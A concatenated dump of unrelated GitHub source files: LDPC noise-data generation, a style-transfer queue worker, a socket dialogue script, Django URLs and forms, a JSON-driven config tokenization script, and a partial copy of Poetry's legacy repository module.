x_bits, u_coded_bits, s_mod, ch_noise, y_receive, r_factor = Transmission.RLN_transmission(SNR, batch_size, train_config, code, channel)
y_receive = y_receive.astype(np.float32)
y_receive.tofile(fout_feature) # write features to file
x_bits = x_bits.astype(np.float32)
x_bits.tofile(fout_label)
r_factor = r_factor.astype(np.float32)
r_factor.tofile(fout_factor)
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
def Generate_AWGN_Decoding_Data(gen_config, code):
#initialized
SNR_set = gen_config.SNR_set
total_samples = gen_config.total_samples
batch_size = 5000
K = gen_config.K_code
N = gen_config.N_code
rng = np.random.RandomState(None)
total_batches = int(total_samples // (batch_size*K))
## Data generating starts
start = datetime.datetime.now()
for SNR in SNR_set:
y_recieve_file = format('%s_%.1f.dat' % (gen_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (gen_config.decoding_x_file, SNR))
fout_yrecieve = open(y_recieve_file, 'wb')
fout_xtransmit = open(x_transmit_file, 'wb')
for ik in range(0, total_batches):
x_bits = np.zeros((batch_size, K))
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
noise_awgn = rng.randn(batch_size, N)
ch_noise_normalize = noise_awgn.astype(np.float32)
ch_noise_sigma = np.sqrt(1 / np.power(10, SNR / 10.0) / 2.0)
ch_noise = ch_noise_normalize * ch_noise_sigma
y_receive = s_mod + ch_noise
y_receive = y_receive.astype(np.float32)
y_receive.tofile(fout_yrecieve)
x_bits = x_bits.astype(np.float32)
x_bits.tofile(fout_xtransmit)
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
def Generate_ACGN_Decoding_Data(gen_config, code):
#initialized
SNR_set = gen_config.SNR_set
total_samples = gen_config.total_samples
batch_size = 5000
K = gen_config.K_code
N = gen_config.N_code
rng = np.random.RandomState(None)
total_batches = int(total_samples // (batch_size*K))
## Data generating starts
start = datetime.datetime.now()
fin_cov_file = open(gen_config.cov_1_2_file , 'rb')
cov_1_2_mat = np.fromfile(fin_cov_file, np.float32, N*N)
cov_1_2_mat = np.reshape(cov_1_2_mat, [N, N])
fin_cov_file.close()
for SNR in SNR_set:
y_recieve_file = format('%s_%.1f.dat' % (gen_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (gen_config.decoding_x_file, SNR))
fout_yrecieve = open(y_recieve_file, 'wb')
fout_xtransmit = open(x_transmit_file, 'wb')
for ik in range(0, total_batches):
x_bits = np.zeros((batch_size, K))
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
noise_awgn = rng.randn(batch_size, N)
ch_noise_normalize = noise_awgn.astype(np.float32)
ch_noise_normalize = np.matmul(ch_noise_normalize, cov_1_2_mat)
ch_noise_sigma = np.sqrt(1 / np.power(10, SNR / 10.0) / 2.0)
ch_noise = ch_noise_normalize * ch_noise_sigma
y_receive = s_mod + ch_noise
y_receive = y_receive.astype(np.float32)
y_receive.tofile(fout_yrecieve)
x_bits = x_bits.astype(np.float32)
x_bits.tofile(fout_xtransmit)
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
def Generate_RLN_Decoding_Data(gen_config, code):
#initialized
SNR_set = gen_config.SNR_set
total_samples = gen_config.total_samples
batch_size = 5000
K = gen_config.K_code
N = gen_config.N_code
rng = np.random.RandomState(None)
total_batches = int(total_samples // (batch_size*K))
## Data generating starts
start = datetime.datetime.now()
for SNR in SNR_set:
y_recieve_file = format('%s_%.1f.dat' % (gen_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (gen_config.decoding_x_file, SNR))
r_factor_file = format('%s_%.1f.dat' % (gen_config.decoding_r_file, SNR))
fout_yrecieve = open(y_recieve_file, 'wb')
fout_xtransmit = open(x_transmit_file, 'wb')
fout_rfactor = open(r_factor_file, 'wb')
for ik in range(0, total_batches):
x_bits = np.zeros([batch_size, K])
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
noise_awgn = rng.randn(batch_size, N)
ch_noise_normalize = noise_awgn.astype(np.float32)
ch_noise_sigma = np.sqrt(1 / np.power(10, SNR / 10.0) / 2.0)
rayleigh_factor = np.sqrt(np.square(np.sqrt(1/2)*np.random.randn(batch_size, N))+np.square(np.sqrt(1/2)*np.random.randn(batch_size, N)))
ch_noise = ch_noise_normalize * ch_noise_sigma
y_receive = np.multiply(rayleigh_factor, s_mod) + ch_noise
y_receive = y_receive.astype(np.float32)
y_receive.tofile(fout_yrecieve)
x_bits = x_bits.astype(np.float32)
x_bits.tofile(fout_xtransmit)
r_factor = rayleigh_factor.astype(np.float32)
r_factor.tofile(fout_rfactor)
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
|
[
"noreply@github.com"
] |
Leo-Chu.noreply@github.com
|
ee33100ebfe158e582551215af19e15f525d5eb3
|
04b2d06348bb7462fd9ec6f470a0ced6eeb0c639
|
/scoring_app/process_images_from_queue.py
|
a6139f614a87fafbff33fb2f14fa7d80c9af3a60
|
[
"LicenseRef-scancode-generic-cla"
] |
no_license
|
pjh177787/batch-scoring-deep-learning-models-with-aks-cn
|
0929377e7ad67a736be46bd175242e48dfb6e269
|
2d557a923d2a01432494a79279f28c4e4848d9c2
|
refs/heads/master
| 2020-06-21T06:13:06.898546
| 2019-07-18T10:13:39
| 2019-07-18T10:13:39
| 197,363,746
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,171
|
py
|
import ast
import style_transfer
import pathlib
import datetime
import time
import os
import logging
import util
import torch
from logging.handlers import RotatingFileHandler
def add_file_handler(logger, log_path):
"""
:param log_path: the log file to attach the handler to
"""
handler_format = util.get_handler_format()
file_handler = RotatingFileHandler(log_path, maxBytes=20000)
file_handler.setFormatter(handler_format)
logger.addHandler(file_handler)
def dequeue(bus_service, model_dir, queue, mount_dir, terminate=None):
"""
:param bus_service: service bus client
:param model_dir: the directory in storage where models are stored
:param queue: the name of the queue
:param terminate: (optional) used for debugging - terminate process instead of stay alive
"""
logger = logging.getLogger("root")
# start listening...
logger.debug("Start listening to queue '{}' on service bus...".format(queue))
while True:
# inspect queue
logger.debug("Peek queue...")
msg = bus_service.receive_queue_message(queue, peek_lock=True, timeout=30)
if msg.body is None:
if terminate:
logger.debug(
"Receiver has timed out, queue is empty. Exiting program..."
)
exit(0)
else:
logger.debug(
"Receiver has timed out, queue is empty. Waiting 1 minute before trying again..."
)
time.sleep(60)
continue
# get style, input_frame, input_dir & output_dir from msg body
msg_body = ast.literal_eval(msg.body.decode("utf-8"))
input_frame = msg_body["input_frame"]
video_name = msg_body["video_name"]
input_dir = os.path.join(mount_dir, video_name, util.Storage.INPUT_DIR.value)
output_dir = os.path.join(mount_dir, video_name, util.Storage.OUTPUT_DIR.value)
log_dir = os.path.join(mount_dir, video_name, "logs")
# make output dir if not exists
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# make log dir if not exists
if not os.path.exists(log_dir):
os.makedirs(log_dir)
# create a new file handler for style transfer logs
log_file = "{}.log".format(input_frame.split(".")[0])
add_file_handler(logger, os.path.join(log_dir, log_file))
logger.debug("Queue message body: {}".format(msg_body))
# run style transfer
logger.debug("Starting style transfer on {}/{}".format(input_dir, input_frame))
style_transfer.stylize(
content_scale=None,
model_dir=os.path.join(mount_dir, model_dir),
cuda=1 if torch.cuda.is_available() else 0,
content_dir=input_dir,
content_filename=input_frame,
output_dir=output_dir,
)
logger.debug("Finished style transfer on {}/{}".format(input_dir, input_frame))
# delete msg
logger.debug("Deleting queue message...")
msg.delete()
# pop logger handler
logger.handlers.pop()
|
[
"aperture@Scarborough.2a1h0bsfp3uezfmu44rlql2klg.shax.internal.chinacloudapp.cn"
] |
aperture@Scarborough.2a1h0bsfp3uezfmu44rlql2klg.shax.internal.chinacloudapp.cn
|
ee7b001a184f4b2cd7e008645fad0b0d6cfa2f51
|
e9b17518c315067442f839f226fdea55694bda7e
|
/RUR_II47.py
|
e680a4676e9cb0b5a46b126c47e262fa5e9e4786
|
[] |
no_license
|
bvrbanec/R.U.R.
|
2a21dc4c05244bd01d30539c131a0e0270806ec8
|
71952b597fb2aa305983408ac5873d7fc5318ffc
|
refs/heads/master
| 2021-05-30T19:12:27.574998
| 2016-01-19T10:00:40
| 2016-01-19T10:00:40
| 47,398,984
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,255
|
py
|
import socket
import time
try:
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind(('192.168.1.110', 8072))
serversocket.listen(5) # become a server socket, maximum 5 connections
radius, address1 = serversocket.accept() ##pocetna spajanja
print(radius,address1)
time.sleep(5)
x=raw_input() #helena-covjek: poor radius
radius.send('ja te volim') #send me to tha stamping mill
radius, address1 = serversocket.accept()
print(radius,address1)
#helena: but i dont want them to kill you
x=raw_input()
radius.send('ja te volim') #i won't work
radius, address1 = serversocket.accept()
print(radius,address1)
#helena: do you hate us? why?
x=raw_input()
radius.send('ja te volim') #You are not as strog as the robots
radius, address1 = serversocket.accept()
print(radius,address1)
#helena: but someone must give orders
x=raw_input()
radius.send('ja te volim') #i don't want any master
radius, address1 = serversocket.accept()
print(radius,address1)
#helena: Radius, dr.Gall gave you a better brain
x=raw_input()
radius.send('ja te volim') #i don't want any master
radius, address1 = serversocket.accept()
print(radius,address1)
#helena: I'm sure they'd put you in charge
x=raw_input()
radius.send('ja te volim') #I'm sure they'd put you in charge
radius, address1 = serversocket.accept()
print(radius,address1)
#helena: You are mad.
x=raw_input()
radius.send('ja te volim') #Then send me to the stamping-mill.
radius, address1 = serversocket.accept()
print(radius,address1)
#helena: Do you think we're afraid of you
x=raw_input()
radius.send('ja te volim') #What are you going to do?
radius, address1 = serversocket.accept()
print(radius,address1)
serversocket.close()
finally:
serversocket.close()
|
[
"k-ova@windowslive.com"
] |
k-ova@windowslive.com
|
d518e784b4d8bec047a3681717598e57ef0d1e66
|
6c523408c0122547d84ac7926cb67ee24f070efd
|
/06-crud-jango/project/urls.py
|
fcfd5c910cfb4a29a6c9f98c003559a2a729f1b9
|
[] |
no_license
|
everaldobass/curso-python3
|
153f4364713f76984ccb00670defa927bdbdc4eb
|
1874803ff957df246fa052f5588f6066f4f948d9
|
refs/heads/master
| 2023-05-02T13:25:50.169067
| 2021-05-18T20:01:52
| 2021-05-18T20:01:52
| 186,182,832
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,171
|
py
|
"""project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
# import home
from app.views import home, form, create, view, edit, update, delete
urlpatterns = [
path('admin/', admin.site.urls),
# criou a url home
path('', home, name='home'),
path('form/', form, name='form'),
path('create/', create, name='create'),
path('view/<int:pk>/', view, name='view'),
path('edit/<int:pk>/', edit, name='edit'),
path('update/<int:pk>/', update, name='update'),
path('delete/<int:pk>/', delete, name='delete')
]
|
[
"everaldobass@gmail.com"
] |
everaldobass@gmail.com
|
5317db7c60d9495980afc0deed2e52eba40c2cdc
|
c1d595150f3e983e75822af1f8ac1b31c4f35806
|
/generic_json_tokenization.py
|
f10ded8f740417522d97b1e03ef2e80a891873c8
|
[] |
no_license
|
soumabhasarkar/Tokenization
|
c48baf9bdac702c1956d595d10f1d0891fd48fe4
|
bd281d8e30b4525a5431d312ee8381d9aea2b300
|
refs/heads/master
| 2020-03-29T23:31:02.011834
| 2018-09-26T19:11:12
| 2018-09-26T19:11:12
| 150,476,362
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,667
|
py
|
#!/usr/bin/env python
"""Tokenization script to find and replace ."""
__author__ = "Soumabha Sarkar"
__version__ = "1.0.2"
__maintainer__ = "Soumabha Sarkar"
__email__ = "soumabhasarkar@gmail.com"
import sys
import argparse
import errno
import os, fnmatch
import csv
import ast
import json
import traceback
import subprocess
import itertools
db_details_dict_keys = ['oltpDbName','cfgDbName','hostOltp','hostCfg']
def getTokenForFile(filepath, inculde_filetype_dict, exculde_filetype_dict):
final_include_tokens = []
try:
# Get all include & exclude file or file type
inculde_filetype_list = inculde_filetype_dict.keys()
exculde_filetype_list = exculde_filetype_dict.keys()
# Filter include & exclude file or file type based on the file name
filename_inculde_filetype_keys = [filetype for filetype in inculde_filetype_list if fnmatch.fnmatch( filepath, '*'+filetype)]
filename_exculde_filetype_keys = [filetype for filetype in exculde_filetype_list if fnmatch.fnmatch( filepath, '*'+filetype)]
include_tokens = []
exculde_tokens = []
# Get tokens for filtered include & exclude file or file type
for item in filename_inculde_filetype_keys:
include_tokens = include_tokens + inculde_filetype_dict[item]
for item in filename_exculde_filetype_keys:
exculde_tokens = exculde_tokens + exculde_filelist_dict[item]
# Remove tokens for exclude files
final_include_tokens = [token for token in include_tokens if token not in exculde_tokens]
# Remove duplicate tokens
final_include_tokens.sort()
final_include_tokens = list(final_include_tokens for final_include_tokens,_ in itertools.groupby(final_include_tokens))
except Exception as ex:
print('Error occured while getting token information for {0}'.format(filepath))
print(traceback.print_exc(file=sys.stdout))
sys.exit(1)
return final_include_tokens
def findReplace(directory, inculde_filetype_dict, exculde_filetype_dict):
outputlst = []
for path, dirs, files in os.walk(os.path.abspath(directory)):
for filename in files:
filepath = os.path.join(path, filename)
new_file = True
final_include_tokens = getTokenForFile(filepath, inculde_filetype_dict, exculde_filetype_dict)
if final_include_tokens:
for token in final_include_tokens:
out_str = ''
try:
findstr = token[0]
replacestr = token[1]
find_found = False
printstr = ''
with open(filepath, "r", encoding='ISO-8859-1') as f:
s = f.readlines()
for item in s:
if item.find(findstr) > -1:
find_found = True
out_str += item.replace(findstr, replacestr)
if find_found:
with open(
filepath,
"w",
encoding='ISO-8859-1',
errors='ignore') as f:
outputlst.append(filepath)
if new_file:
print('Modifying {0}'.format(filepath))
new_file = False
print('Original String ====%s==== Replace with ====%s====' %(findstr, replacestr))
f.write(out_str)
except Exception as ex:
print('Error: Cannot replace {0} with {1} in {2} file'.format(findstr, replacestr, filepath))
print(traceback.print_exc(file=sys.stdout))
pass
return outputlst
def getDbHostDbService(reader, host_env):
db_detail = dict.fromkeys(db_details_dict_keys)
try:
# Get DB details in JSON file
db_dict = reader['db_dict']
host_db = reader['host_db']
# check if there is any DB Host suffix defined for Hosting Environment
if host_env in host_db.keys():
host_oltp = host_db[host_env][0]
host_cfg = host_db[host_env][1]
else:
host_oltp = host_db['seed'][0]
host_cfg = host_db['seed'][1]
# Get DB Service name according to Environment
oltp_db_name = db_dict[host_env] + reader['db_type']['type'][0]
cfg_db_name = db_dict[host_env] + reader['db_type']['type'][1]
db_detail['oltpDbName'] = oltp_db_name
db_detail['cfgDbName'] = cfg_db_name
db_detail['hostOltp'] = host_oltp
db_detail['hostCfg'] = host_cfg
except IndexError:
print('Error: Array out of Index ')
print(traceback.print_exc(file=sys.stdout))
print('DB Host suffix not found. Terminating process ')
sys.exit(1)
except ValueError:
print("Error: Decoding JSON failed")
print(traceback.print_exc(file=sys.stdout))
print('DB Service name not found. Terminating process ')
sys.exit(1)
except Exception as ex:
print("Error: Unhandled exception occured ")
print(traceback.print_exc(file=sys.stdout))
print('Terminating process ')
sys.exit(1)
return db_detail
def getFileList(token, node):
try:
filetype_list = token[node]
except:
filetype_list = []
return filetype_list
def tokenize(jsonfilepath, host_env, host_reg, host_tier):
fileExist = os.path.exists(jsonfilepath)
if not fileExist:
print("The JSON file \"{0}\" does not exists. Process terminated".format(jsonfilepath))
sys.exit(errno.ENOENT)
with open(jsonfilepath, 'r') as jsonfile:
try:
reader = json.load(jsonfile)
except ValueError:
print('{} is not a valid json file'.format(jsonfilepath))
print(traceback.print_exc(file=sys.stdout))
sys.exit(errno.EBFONT)
DbHostDbService = getDbHostDbService(reader,host_env)
include_files_dict = {}
exculde_files_dict = {}
for token in reader['tokenize']['tokens']:
try:
replacestr=''
pattern = token['pattern'] # Check if Replace Token follows a pattern
if pattern:
findstr = token['find']
replacestr = token['replace'].replace('$HOST_REGION$', host_reg).replace(
'$HOST_ENV$', host_env).replace(
'$OLTP_DB_NAME$', DbHostDbService['oltpDbName'].lower()).replace( # Replace OLTP DB Service Name
'$CFG_DB_NAME$',DbHostDbService['cfgDbName'].lower()).replace( # Replace CFG DB Service Name
'$HOST_OLTP$',DbHostDbService['hostOltp'].lower()).replace( # Replace OLTP DB Host suffix
'$HOST_CFG$', DbHostDbService['hostCfg'].lower()).replace( # Replace CFG DB Host suffix
'$HOST_TIER$',host_tier.upper())
else:
findstr = token['find']
replacestr = token[host_tier] #Replace string follows no pattern. Replace string value varies according to Deployment Environment
include_file_list = getFileList(token, 'includeFiles')
exculde_file_list = getFileList(token, 'excludeFiles')
for include_file in include_file_list :
include_files_dict.setdefault(include_file,[]).append([findstr,replacestr]) # Filter Tokens by Include File type
for exculde_file in exculde_file_list:
exculde_files_dict.setdefault(exculde_file,[]).append([findstr,replacestr]) # Filter Tokens by Exclude File type
except:
print('Error:')
print(traceback.print_exc(file=sys.stdout))
sys.exit(1)
output = findReplace('.', include_files_dict, exculde_files_dict)
if output:
print('Total {0} files modified'.format(len(output)))
print(
"==================================================================\n"
)
def xstr(s):
return '' if s is None else str(s)
class TokenizationArgumentParser(argparse.ArgumentParser):
def error(self, message):
sys.stderr.write('Error: %s\n' % message)
self.print_help()
sys.exit(errno.EINVAL)
def main():
parser = TokenizationArgumentParser(
description='This Script will replace DB URLs and other service URLs mentioned in JSON file depending on Deployment Env and Region')
parser.add_argument(
'-c', '--config', action='store', dest='jsonFilePath', required= True, help='JSON File path')
parser.add_argument(
'-r', '--region', action='store', dest='region', required= True, help='host region e.g. ie1, de1')
parser.add_argument(
'-e', '--environment', action='store', dest='environment', required= True, help='host env e.g. dev1, dev2, qa1')
parser.add_argument(
'-t','--tier', action='store', dest='tier', required= True, help='deploy tier e.g. dev, qa, prod')
results = parser.parse_args()
print ('Hosting Environment name: {0} \nHosting Tier: {1} \nRegion: {2} \nJSON file path: {3}'.format(
results.environment, results.tier, results.region, results.jsonFilePath))
host_reg = xstr(results.region).lower()
host_env = xstr(results.environment).lower()
host_tier = xstr(results.tier).lower()
json_filepath = results.jsonFilePath
print('===================Tokenization Starts======================')
tokenize(json_filepath, host_env, host_reg, host_tier)
print('===================Tokenization Ends======================')
if __name__ == "__main__":
main()
|
[
"soumabhasarkar@gmail.com"
] |
soumabhasarkar@gmail.com
|
9af86858361e28982c68c5f85ab4f527d3464dc4
|
dfc8a69e9a03ca4b48f2107acfe38553e3247544
|
/python/05scrapy/dongguan/dongguan/spiders/dongguansun.py
|
15775ad052b243e020724459b41a4de9075cf371
|
[] |
no_license
|
Leap-Zhao/skills_program
|
ec943c6d68fcb8a01aee1b8ed970a82c86f44e63
|
11faf8b51aa1b7b9bee7e68a7fac98c030e6aac2
|
refs/heads/master
| 2018-11-15T10:21:57.663875
| 2018-09-20T10:20:23
| 2018-09-20T10:20:23
| 83,137,789
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,750
|
py
|
# -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from dongguan.items import DongguanItem
class DongguansunSpider(CrawlSpider):
name = 'dongguansun'
allowed_domains = ['wz.sun0769.com']
start_urls = ['http://wz.sun0769.com/index.php/question/questionType?type=4&page=0']
# 每一页的其它页面链接列表
pageLinks = LinkExtractor(allow=r'type=4&page=\d+')
# 每一页的贴子的链接列表
postLinks = LinkExtractor(allow=r'/html/question/\d+/\d+.shtml')
rules = (
Rule(pageLinks, follow=True),
Rule(postLinks, callback='parse_item',follow=False),
)
def parse_item(self, response):
# print response.url
item = DongguanItem()
item['title'] = response.xpath("//div[@class='pagecenter p3']//strong/text()").extract()[0]
item['titleId'] = item['title'].strip().split(" ")[-1].split(":")[-1]
# 如果是有图片时,存在class为contentext的div
contentext = response.xpath("//div[@class='contentext']/text()").extract()
if len(contentext) == 0:
# 没有图片
contentext = response.xpath("//div[@class='c1 text14_2']/text()").extract()
item['content'] = ''.join(contentext).strip()
else:
# 有图片
item['content'] = ''.join(contentext).strip()
item['url'] = response.url
yield item
#i['domain_id'] = response.xpath('//input[@id="sid"]/@value').extract()
#i['name'] = response.xpath('//div[@id="name"]').extract()
#i['description'] = response.xpath('//div[@id="description"]').extract()
# return i
|
[
"zhaofeiyue1234@163.com"
] |
zhaofeiyue1234@163.com
|
02536f12ed72c61c39d338b3dffda9b337c60f10
|
3ffb03144c4d2ac03bae54ae492969f02dc6e52d
|
/contact/forms.py
|
4c73a1665feb7592f3b5c3084b004e7794c56927
|
[] |
no_license
|
onadj/brunoshop
|
4e1e705b5d7d9ea157b7ddbbcafecf7d9dcc4bda
|
926b5afb7f2787d9fef626e7903d5cb219e81180
|
refs/heads/master
| 2023-02-16T18:02:33.103335
| 2021-01-12T19:24:29
| 2021-01-12T19:24:29
| 324,526,008
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
py
|
from django import forms
class ContactForm(forms.Form):
subject = forms.CharField()
# phone = forms.CharField()
from_email = forms.EmailField(required=True)
message = forms.CharField(widget=forms.Textarea, required=True)
|
[
"oliver.nad@gmail.com"
] |
oliver.nad@gmail.com
|
825659d2cff6fe1c1c3a8ae5f12736385911d780
|
2df8c5c10dbde5463af74d6c159536e9389c4623
|
/.vscode/extensions/batisteo.vscode-django-1.3.0/.venv/lib/python3.9/site-packages/poetry/repositories/legacy_repository.py
|
7442d65a561f19039709e32826ce469441f47ce0
|
[
"MIT"
] |
permissive
|
cclint/dotfiles
|
be35589d0c8293c94a628eb935da5b7e29de473c
|
8dbd1b768add3fdb68e749f965ef3025ee9de4ed
|
refs/heads/master
| 2023-03-19T08:44:51.600748
| 2021-03-11T04:52:49
| 2021-03-11T04:52:49
| 282,515,062
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,458
|
py
|
import cgi
import re
import warnings
from collections import defaultdict
from typing import Generator
from typing import Optional
from typing import Union
import requests
import requests.auth
from cachecontrol import CacheControl
from cachecontrol.caches.file_cache import FileCache
from cachy import CacheManager
from poetry.core.packages import Package
from poetry.core.packages.utils.link import Link
from poetry.core.semver import Version
from poetry.core.semver import VersionConstraint
from poetry.core.semver import VersionRange
from poetry.core.semver import parse_constraint
from poetry.locations import REPOSITORY_CACHE_DIR
from poetry.utils._compat import Path
from poetry.utils.helpers import canonicalize_name
from poetry.utils.patterns import wheel_file_re
from ..config.config import Config
from ..inspection.info import PackageInfo
from ..installation.authenticator import Authenticator
from .exceptions import PackageNotFound
from .exceptions import RepositoryError
from .pypi_repository import PyPiRepository
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
try:
from html import unescape
except ImportError:
try:
from html.parser import HTMLParser
except ImportError:
from HTMLParser import HTMLParser
unescape = HTMLParser().unescape
try:
from urllib.parse import quote
except ImportError:
from urllib import quote
with warnings.catch_warnings():
warnings.simplefilter("ignore")
import html5lib
class Page:
VERSION_REGEX = re.compile(r"(?i)([a-z0-9_\-.]+?)-(?=\d)([a-z0-9_.!+-]+)")
SUPPORTED_FORMATS = [
".tar.gz",
".whl",
".zip",
".tar.bz2",
".tar.xz",
".tar.Z",
".tar",
]
def __init__(self, url, content, headers):
if not url.endswith("/"):
url += "/"
self._url = url
encoding = None
if headers and "Content-Type" in headers:
content_type, params = cgi.parse_header(headers["Content-Type"])
if "charset" in params:
encoding = params["charset"]
self._content = content
if encoding is None:
self._parsed = html5lib.parse(content, namespaceHTMLElements=False)
else:
self._parsed = html5lib.parse(
content, transport_encoding=encoding, namespaceHTMLElements=False
)
@property
def versions(self): # type: () -> Generator[Version]
seen = set()
for link in self.links:
version = self.link_version(link)
if not version:
continue
if version in seen:
continue
seen.add(version)
yield version
@property
def links(self): # type: () -> Generator[Link]
for anchor in self._parsed.findall(".//a"):
if anchor.get("href"):
href = anchor.get("href")
url = self.clean_link(urlparse.urljoin(self._url, href))
pyrequire = anchor.get("data-requires-python")
pyrequire = unescape(pyrequire) if pyrequire else None
link = Link(url, self, requires_python=pyrequire)
if link.ext not in self.SUPPORTED_FORMATS:
continue
yield link
def links_for_version(self, version): # type: (Version) -> Generator[Link]
for link in self.links:
if self.link_version(link) == version:
yield link
def link_version(self, link): # type: (Link) -> Union[Version, None]
m = wheel_file_re.match(link.filename)
if m:
version = m.group("ver")
else:
info, ext = link.splitext()
match = self.VERSION_REGEX.match(info)
if not match:
return
version = match.group(2)
try:
version = Version.parse(version)
except ValueError:
return
return version
_clean_re = re.compile(r"[^a-z0-9$&+,/:;=?@.#%_\\|-]", re.I)
def clean_link(self, url):
"""Makes sure a link is fully encoded. That is, if a ' ' shows up in
the link, it will be rewritten to %20 (while not over-quoting
% or other characters)."""
return self._clean_re.sub(lambda match: "%%%2x" % ord(match.group(0)), url)
class LegacyRepository(PyPiRepository):
def __init__(
self, name, url, config=None, disable_cache=False, cert=None, client_cert=None
): # type: (str, str, Optional[Config], bool, Optional[Path], Optional[Path]) -> None
if name == "pypi":
raise ValueError("The name [pypi] is reserved for repositories")
self._packages = []
self._name = name
self._url = url.rstrip("/")
self._client_cert = client_cert
self._cert = cert
self._cache_dir = REPOSITORY_CACHE_DIR / name
self._cache = CacheManager(
{
"default": "releases",
"serializer": "json",
"stores": {
"releases": {"driver": "file", "path": str(self._cache_dir)},
"packages": {"driver": "dict"},
"matches": {"driver": "dict"},
},
}
)
self._authenticator = Authenticator(
config=config or Config(use_environment=True)
)
self._basic_auth = None
username, password = self._authenticator.get_credentials_for_url(self._url)
if username is not None and password is not None:
self._basic_auth = requests.auth.HTTPBasicAuth(username, password)
self._disable_cache = disable_cache
@property
def cert(self): # type: () -> Optional[Path]
return self._cert
@property
def client_cert(self): # type: () -> Optional[Path]
return self._client_cert
@property
def session(self):
session = self._authenticator.session
if self._basic_auth:
session.auth = self._basic_auth
if self._cert:
session.verify = str(self._cert)
if self._client_cert:
session.cert = str(self._client_cert)
return CacheControl(session, cache=FileCache(str(self._cache_dir / "_http")))
@property
def authenticated_url(self): # type: () -> str
if not self._basic_auth:
return self.url
parsed = urlparse.urlparse(self.url)
return "{scheme}://{username}:{password}@{netloc}{path}".format(
scheme=parsed.scheme,
username=quote(self._basic_auth.username, safe=""),
password=quote(self._basic_auth.password, safe=""),
netloc=parsed.netloc,
path=parsed.path,
)
def find_packages(self, dependency):
packages = []
constraint = dependency.constraint
if constraint is None:
constraint = "*"
if not isinstance(constraint, VersionConstraint):
constraint = parse_constraint(constraint)
allow_prereleases = dependency.allows_prereleases()
if isinstance(constraint, VersionRange):
if (
constraint.max is not None
and constraint.max.is_prerelease()
or constraint.min is not None
and constraint.min.is_prerelease()
):
allow_prereleases = True
key = dependency.name
if not constraint.is_any():
key = "{}:{}".format(key, str(constraint))
ignored_pre_release_versions = []
if self._cache.store("matches").has(key):
versions = self._cache.store("matches").get(key)
else:
page = self._get("/{}/".format(dependency.name.replace(".", "-")))
if page is None:
return []
versions = []
for version in page.versions:
if version.is_prerelease() and not allow_prereleases:
if constraint.is_any():
# we need this when all versions of the package are pre-releases
ignored_pre_release_versions.append(version)
continue
if constraint.allows(version):
versions.append(version)
self._cache.store("matches").put(key, versions, 5)
for package_versions in (versions, ignored_pre_release_versions):
for version in package_versions:
package = Package(
dependency.name,
version,
source_type="legacy",
source_reference=self.name,
source_url=self._url,
)
packages.append(package)
self._log(
"{} packages found for {} {}".format(
len(packages), dependency.name, str(constraint)
),
level="debug",
)
if packages or not constraint.is_any():
# we have matching packages, or constraint is not (*)
break
return packages
def package(self, name, version, extras=None): # type: (...) -> Package
"""
Retrieve the release information.
This is a heavy task which takes time.
We have to download a package to get the dependencies.
We also need to download every file matching this release
to get the various hashes.
Note that this will be cached so the subsequent operations
should be much faster.
"""
try:
index = self._packages.index(Package(name, version, version))
return self._packages[index]
except ValueError:
package = super(LegacyRepository, self).package(name, version, extras)
package._source_type = "legacy"
package._source_url = self._url
package._source_reference = self.name
return package
def find_links_for_package(self, package):
page = self._get("/{}/".format(package.name.replace(".", "-")))
if page is None:
return []
return list(page.links_for_version(package.version))
def _get_release_info(self, name, version): # type: (str, str) -> dict
page = self._get("/{}/".format(canonicalize_name(name).replace(".", "-")))
if page is None:
raise PackageNotFound('No package named "{}"'.format(name))
data = PackageInfo(
name=name,
version=version,
summary="",
platform=None,
requires_dist=[],
requires_python=None,
files=[],
cache_version=str(self.CACHE_VERSION),
)
links = list(page.links_for_version(Version.parse(version)))
if not links:
raise PackageNotFound(
'No valid distribution links found for package: "{}" version: "{}"'.format(
name, version
)
)
urls = defaultdict(list)
files = []
for link in links:
if link.is_wheel:
urls["bdist_wheel"].append(link.url)
elif link.filename.endswith(
(".tar.gz", ".zip", ".bz2", ".xz", ".Z", ".tar")
):
urls["sdist"].append(link.url)
h = link.hash
if h:
h = link.hash_name + ":" + link.hash
files.append({"file": link.filename, "hash": h})
data.files = files
info = self._get_info_from_urls(urls)
data.summary = info.summary
data.requires_dist = info.requires_dist
data.requires_python = info.requires_python
return data.asdict()
def _get(self, endpoint): # type: (str) -> Union[Page, None]
url = self._url + endpoint
try:
response = self.session.get(url)
if response.status_code == 404:
return
response.raise_for_status()
except requests.HTTPError as e:
